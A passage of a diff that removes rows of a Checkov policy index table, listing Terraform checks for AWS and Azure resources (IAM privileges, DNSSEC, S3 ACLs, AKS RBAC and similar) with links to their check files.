-| 1112 | CKV2_AWS_37     | resource | aws_waf_rate_based_rule                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1113 | CKV2_AWS_37     | resource | aws_waf_regex_match_set                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1114 | CKV2_AWS_37     | resource | aws_waf_regex_pattern_set                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1115 | CKV2_AWS_37     | resource | aws_waf_rule                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1116 | CKV2_AWS_37     | resource | aws_waf_rule_group                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1117 | CKV2_AWS_37     | resource | aws_waf_size_constraint_set                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1118 | CKV2_AWS_37     | resource | aws_waf_sql_injection_match_set                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1119 | CKV2_AWS_37     | resource | aws_waf_web_acl                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1120 | CKV2_AWS_37     | resource | aws_waf_xss_match_set                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1121 | CKV2_AWS_37     | resource | aws_wafregional_byte_match_set                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1122 | CKV2_AWS_37     | resource | aws_wafregional_geo_match_set                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1123 | CKV2_AWS_37     | resource | aws_wafregional_ipset                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1124 | CKV2_AWS_37     | resource | aws_wafregional_rate_based_rule                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1125 | CKV2_AWS_37     | resource | aws_wafregional_regex_match_set                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1126 | CKV2_AWS_37     | resource | aws_wafregional_regex_pattern_set                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1127 | CKV2_AWS_37     | resource | aws_wafregional_rule                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1128 | CKV2_AWS_37     | resource | aws_wafregional_rule_group                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1129 | CKV2_AWS_37     | resource | aws_wafregional_size_constraint_set                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1130 | CKV2_AWS_37     | resource | aws_wafregional_sql_injection_match_set                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1131 | CKV2_AWS_37     | resource | aws_wafregional_web_acl                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1132 | CKV2_AWS_37     | resource | aws_wafregional_web_acl_association                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1133 | CKV2_AWS_37     | resource | aws_wafregional_xss_match_set                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1134 | CKV2_AWS_37     | resource | aws_wafv2_ip_set                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1135 | CKV2_AWS_37     | resource | aws_wafv2_regex_pattern_set                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1136 | CKV2_AWS_37     | resource | aws_wafv2_rule_group                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1137 | CKV2_AWS_37     | resource | aws_wafv2_web_acl                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1138 | CKV2_AWS_37     | resource | aws_wafv2_web_acl_association                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1139 | CKV2_AWS_37     | resource | aws_wafv2_web_acl_logging_configuration                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1140 | CKV2_AWS_37     | resource | aws_worklink_fleet                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1141 | CKV2_AWS_37     | resource | aws_worklink_website_certificate_authority_association  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1142 | CKV2_AWS_37     | resource | aws_workspaces_directory                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1143 | CKV2_AWS_37     | resource | aws_workspaces_ip_group                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1144 | CKV2_AWS_37     | resource | aws_workspaces_workspace                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1145 | CKV2_AWS_37     | resource | aws_xray_sampling_rule                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1146 | CKV2_AWS_38     | resource | aws_route53_zone                                        | Ensure Domain Name System Security Extensions (DNSSEC) signing is enabled for Amazon Route 53 public hosted zones                                                                                        | Terraform | [Route53ZoneEnableDNSSECSigning.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/Route53ZoneEnableDNSSECSigning.yaml)                                                   |
-| 1147 | CKV2_AWS_39     | resource | aws_route53_zone                                        | Ensure Domain Name System (DNS) query logging is enabled for Amazon Route 53 hosted zones                                                                                                                | Terraform | [Route53ZoneHasMatchingQueryLog.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/Route53ZoneHasMatchingQueryLog.yaml)                                                   |
-| 1148 | CKV2_AWS_40     | resource | aws_iam_group_policy                                    | Ensure AWS IAM policy does not allow full IAM privileges                                                                                                                                                 | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml)                                                   |
-| 1149 | CKV2_AWS_40     | resource | aws_iam_policy                                          | Ensure AWS IAM policy does not allow full IAM privileges                                                                                                                                                 | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml)                                                   |
-| 1150 | CKV2_AWS_40     | resource | aws_iam_role_policy                                     | Ensure AWS IAM policy does not allow full IAM privileges                                                                                                                                                 | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml)                                                   |
-| 1151 | CKV2_AWS_40     | resource | aws_iam_user_policy                                     | Ensure AWS IAM policy does not allow full IAM privileges                                                                                                                                                 | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml)                                                   |
-| 1152 | CKV2_AWS_40     | resource | aws_ssoadmin_permission_set_inline_policy               | Ensure AWS IAM policy does not allow full IAM privileges                                                                                                                                                 | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml)                                                   |
-| 1153 | CKV2_AWS_40     | resource | data.aws_iam_policy_document                            | Ensure AWS IAM policy does not allow full IAM privileges                                                                                                                                                 | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml)                                                   |
-| 1154 | CKV2_AWS_41     | resource | aws_instance                                            | Ensure an IAM role is attached to EC2 instance                                                                                                                                                           | Terraform | [EC2InstanceHasIAMRoleAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EC2InstanceHasIAMRoleAttached.yaml)                                                     |
-| 1155 | CKV2_AWS_42     | resource | aws_cloudfront_distribution                             | Ensure AWS CloudFront distribution uses custom SSL certificate                                                                                                                                           | Terraform | [CloudFrontHasCustomSSLCertificate.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontHasCustomSSLCertificate.yaml)                                             |
-| 1156 | CKV2_AWS_43     | resource | aws_s3_bucket_acl                                       | Ensure S3 Bucket does not allow access to all Authenticated users                                                                                                                                        | Terraform | [S3NotAllowAccessToAllAuthenticatedUsers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3NotAllowAccessToAllAuthenticatedUsers.yaml)                                 |
-| 1157 | CKV2_AWS_44     | resource | aws_route                                               | Ensure AWS route table with VPC peering does not contain routes overly permissive to all traffic                                                                                                         | Terraform | [VPCPeeringRouteTableOverlyPermissive.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCPeeringRouteTableOverlyPermissive.yaml)                                       |
-| 1158 | CKV2_AWS_44     | resource | aws_route_table                                         | Ensure AWS route table with VPC peering does not contain routes overly permissive to all traffic                                                                                                         | Terraform | [VPCPeeringRouteTableOverlyPermissive.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCPeeringRouteTableOverlyPermissive.yaml)                                       |
-| 1159 | CKV2_AWS_45     | resource | aws_config_configuration_recorder                       | Ensure AWS Config recorder is enabled to record all supported resources                                                                                                                                  | Terraform | [AWSConfigRecorderEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSConfigRecorderEnabled.yaml)                                                               |
-| 1160 | CKV2_AWS_45     | resource | aws_config_configuration_recorder_status                | Ensure AWS Config recorder is enabled to record all supported resources                                                                                                                                  | Terraform | [AWSConfigRecorderEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSConfigRecorderEnabled.yaml)                                                               |
-| 1161 | CKV2_AWS_46     | resource | aws_cloudfront_distribution                             | Ensure AWS CloudFront Distribution with S3 have Origin Access set to enabled                                                                                                                             | Terraform | [CLoudFrontS3OriginConfigWithOAI.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CLoudFrontS3OriginConfigWithOAI.yaml)                                                 |
-| 1162 | CKV2_AWS_47     | resource | aws_cloudfront_distribution                             | Ensure AWS CloudFront attached WAFv2 WebACL is configured with AMR for Log4j Vulnerability                                                                                                               | Terraform | [CloudFrontWebACLConfiguredWIthLog4jVulnerability.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontWebACLConfiguredWIthLog4jVulnerability.yaml)               |
-| 1163 | CKV2_AWS_47     | resource | aws_wafv2_web_acl                                       | Ensure AWS CloudFront attached WAFv2 WebACL is configured with AMR for Log4j Vulnerability                                                                                                               | Terraform | [CloudFrontWebACLConfiguredWIthLog4jVulnerability.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontWebACLConfiguredWIthLog4jVulnerability.yaml)               |
-| 1164 | CKV2_AWS_48     | resource | aws_config_configuration_recorder                       | Ensure AWS Config must record all possible resources                                                                                                                                                     | Terraform | [ConfigRecorderRecordsAllGlobalResources.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ConfigRecorderRecordsAllGlobalResources.yaml)                                 |
-| 1165 | CKV2_AWS_49     | resource | aws_dms_endpoint                                        | Ensure AWS Database Migration Service endpoints have SSL configured                                                                                                                                      | Terraform | [DMSEndpointHaveSSLConfigured.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/DMSEndpointHaveSSLConfigured.yaml)                                                       |
-| 1166 | CKV2_AWS_50     | resource | aws_elasticache_replication_group                       | Ensure AWS ElastiCache Redis cluster with Multi-AZ Automatic Failover feature set to enabled                                                                                                             | Terraform | [ElastiCacheRedisConfiguredAutomaticFailOver.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ElastiCacheRedisConfiguredAutomaticFailOver.yaml)                         |
-| 1167 | CKV2_AWS_51     | resource | aws_api_gateway_stage                                   | Ensure AWS API Gateway endpoints uses client certificate authentication                                                                                                                                  | Terraform | [APIGatewayEndpointsUsesCertificateForAuthentication.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGatewayEndpointsUsesCertificateForAuthentication.yaml)         |
-| 1168 | CKV2_AWS_51     | resource | aws_apigatewayv2_api                                    | Ensure AWS API Gateway endpoints uses client certificate authentication                                                                                                                                  | Terraform | [APIGatewayEndpointsUsesCertificateForAuthentication.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGatewayEndpointsUsesCertificateForAuthentication.yaml)         |
-| 1169 | CKV2_AWS_51     | resource | aws_apigatewayv2_stage                                  | Ensure AWS API Gateway endpoints uses client certificate authentication                                                                                                                                  | Terraform | [APIGatewayEndpointsUsesCertificateForAuthentication.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGatewayEndpointsUsesCertificateForAuthentication.yaml)         |
-| 1170 | CKV2_AWS_52     | resource | aws_elasticsearch_domain                                | Ensure AWS ElasticSearch/OpenSearch Fine-grained access control is enabled                                                                                                                               | Terraform | [OpenSearchDomainHasFineGrainedControl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/OpenSearchDomainHasFineGrainedControl.yaml)                                     |
-| 1171 | CKV2_AWS_52     | resource | aws_opensearch_domain                                   | Ensure AWS ElasticSearch/OpenSearch Fine-grained access control is enabled                                                                                                                               | Terraform | [OpenSearchDomainHasFineGrainedControl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/OpenSearchDomainHasFineGrainedControl.yaml)                                     |
-| 1172 | CKV2_AWS_53     | resource | aws_api_gateway_method                                  | Ensure AWS API gateway request is validated                                                                                                                                                              | Terraform | [APIGatewayRequestParameterValidationEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGatewayRequestParameterValidationEnabled.yaml)                         |
-| 1173 | CKV2_AWS_54     | resource | aws_cloudfront_distribution                             | Ensure AWS CloudFront distribution is using secure SSL protocols for HTTPS communication                                                                                                                 | Terraform | [CloudFrontUsesSecureProtocolsForHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontUsesSecureProtocolsForHTTPS.yaml)                                     |
-| 1174 | CKV2_AWS_55     | resource | aws_emr_cluster                                         | Ensure AWS EMR cluster is configured with security configuration                                                                                                                                         | Terraform | [EMRClusterHasSecurityConfiguration.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EMRClusterHasSecurityConfiguration.yaml)                                           |
-| 1175 | CKV2_AWS_56     | resource | aws_iam_group_policy_attachment                         | Ensure AWS Managed IAMFullAccess IAM policy is not used.                                                                                                                                                 | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml)                                                     |
-| 1176 | CKV2_AWS_56     | resource | aws_iam_policy_attachment                               | Ensure AWS Managed IAMFullAccess IAM policy is not used.                                                                                                                                                 | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml)                                                     |
-| 1177 | CKV2_AWS_56     | resource | aws_iam_role                                            | Ensure AWS Managed IAMFullAccess IAM policy is not used.                                                                                                                                                 | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml)                                                     |
-| 1178 | CKV2_AWS_56     | resource | aws_iam_role_policy_attachment                          | Ensure AWS Managed IAMFullAccess IAM policy is not used.                                                                                                                                                 | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml)                                                     |
-| 1179 | CKV2_AWS_56     | resource | aws_iam_user_policy_attachment                          | Ensure AWS Managed IAMFullAccess IAM policy is not used.                                                                                                                                                 | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml)                                                     |
-| 1180 | CKV2_AWS_56     | resource | aws_ssoadmin_managed_policy_attachment                  | Ensure AWS Managed IAMFullAccess IAM policy is not used.                                                                                                                                                 | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml)                                                     |
-| 1181 | CKV2_AWS_56     | resource | data.aws_iam_policy                                     | Ensure AWS Managed IAMFullAccess IAM policy is not used.                                                                                                                                                 | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml)                                                     |
-| 1182 | CKV2_AWS_57     | resource | aws_secretsmanager_secret                               | Ensure Secrets Manager secrets should have automatic rotation enabled                                                                                                                                    | Terraform | [SecretsAreRotated.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SecretsAreRotated.yaml)                                                                             |
-| 1183 | CKV2_AWS_58     | resource | aws_neptune_cluster                                     | Ensure AWS Neptune cluster deletion protection is enabled                                                                                                                                                | Terraform | [NeptuneDeletionProtectionEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/NeptuneDeletionProtectionEnabled.yaml)                                               |
-| 1184 | CKV2_AWS_59     | resource | aws_elasticsearch_domain                                | Ensure ElasticSearch/OpenSearch has dedicated master node enabled                                                                                                                                        | Terraform | [ElasticSearchDedicatedMasterEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ElasticSearchDedicatedMasterEnabled.yaml)                                         |
-| 1185 | CKV2_AWS_59     | resource | aws_opensearch_domain                                   | Ensure ElasticSearch/OpenSearch has dedicated master node enabled                                                                                                                                        | Terraform | [ElasticSearchDedicatedMasterEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ElasticSearchDedicatedMasterEnabled.yaml)                                         |
-| 1186 | CKV2_AWS_60     | resource | aws_db_instance                                         | Ensure RDS instance with copy tags to snapshots is enabled                                                                                                                                               | Terraform | [RDSEnableCopyTagsToSnapshot.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/RDSEnableCopyTagsToSnapshot.yaml)                                                         |
-| 1187 | CKV2_AWS_61     | resource | aws_s3_bucket                                           | Ensure that an S3 bucket has a lifecycle configuration                                                                                                                                                   | Terraform | [S3BucketLifecycle.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketLifecycle.yaml)                                                                             |
-| 1188 | CKV2_AWS_62     | resource | aws_s3_bucket                                           | Ensure S3 buckets should have event notifications enabled                                                                                                                                                | Terraform | [S3BucketEventNotifications.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketEventNotifications.yaml)                                                           |
-| 1189 | CKV2_AWS_63     | resource | aws_networkfirewall_firewall                            | Ensure Network firewall has logging configuration defined                                                                                                                                                | Terraform | [NetworkFirewallHasLogging.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/NetworkFirewallHasLogging.yaml)                                                             |
-| 1190 | CKV2_AWS_64     | resource | aws_kms_key                                             | Ensure KMS key Policy is defined                                                                                                                                                                         | Terraform | [KmsKeyPolicyIsDefined.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/KmsKeyPolicyIsDefined.yaml)                                                                     |
-| 1191 | CKV2_AWS_65     | resource | aws_s3_bucket_ownership_controls                        | Ensure access control lists for S3 buckets are disabled                                                                                                                                                  | Terraform | [AWSdisableS3ACL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSdisableS3ACL.yaml)                                                                                 |
-| 1192 | CKV2_AWS_66     | resource | aws_mwaa_environment                                    | Ensure MWAA environment is not publicly accessible                                                                                                                                                       | Terraform | [AWS_private_MWAA_environment.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWS_private_MWAA_environment.yaml)                                                       |
-| 1193 | CKV_AZURE_1     | resource | azurerm_linux_virtual_machine                           | Ensure Azure Instance does not use basic authentication(Use SSH Key Instead)                                                                                                                             | Terraform | [AzureInstancePassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureInstancePassword.py)                                                                           |
-| 1194 | CKV_AZURE_1     | resource | azurerm_virtual_machine                                 | Ensure Azure Instance does not use basic authentication(Use SSH Key Instead)                                                                                                                             | Terraform | [AzureInstancePassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureInstancePassword.py)                                                                           |
-| 1195 | CKV_AZURE_2     | resource | azurerm_managed_disk                                    | Ensure Azure managed disk has encryption enabled                                                                                                                                                         | Terraform | [AzureManagedDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureManagedDiskEncryption.py)                                                                 |
-| 1196 | CKV_AZURE_3     | resource | azurerm_storage_account                                 | Ensure that 'enable_https_traffic_only' is enabled                                                                                                                                                       | Terraform | [StorageAccountsTransportEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountsTransportEncryption.py)                                                 |
-| 1197 | CKV_AZURE_4     | resource | azurerm_kubernetes_cluster                              | Ensure AKS logging to Azure Monitoring is Configured                                                                                                                                                     | Terraform | [AKSLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSLoggingEnabled.py)                                                                                   |
-| 1198 | CKV_AZURE_5     | resource | azurerm_kubernetes_cluster                              | Ensure RBAC is enabled on AKS clusters                                                                                                                                                                   | Terraform | [AKSRbacEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSRbacEnabled.py)                                                                                         |
-| 1199 | CKV_AZURE_6     | resource | azurerm_kubernetes_cluster                              | Ensure AKS has an API Server Authorized IP Ranges enabled                                                                                                                                                | Terraform | [AKSApiServerAuthorizedIpRanges.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSApiServerAuthorizedIpRanges.py)                                                         |
-| 1200 | CKV_AZURE_7     | resource | azurerm_kubernetes_cluster                              | Ensure AKS cluster has Network Policy configured                                                                                                                                                         | Terraform | [AKSNetworkPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSNetworkPolicy.py)                                                                                     |
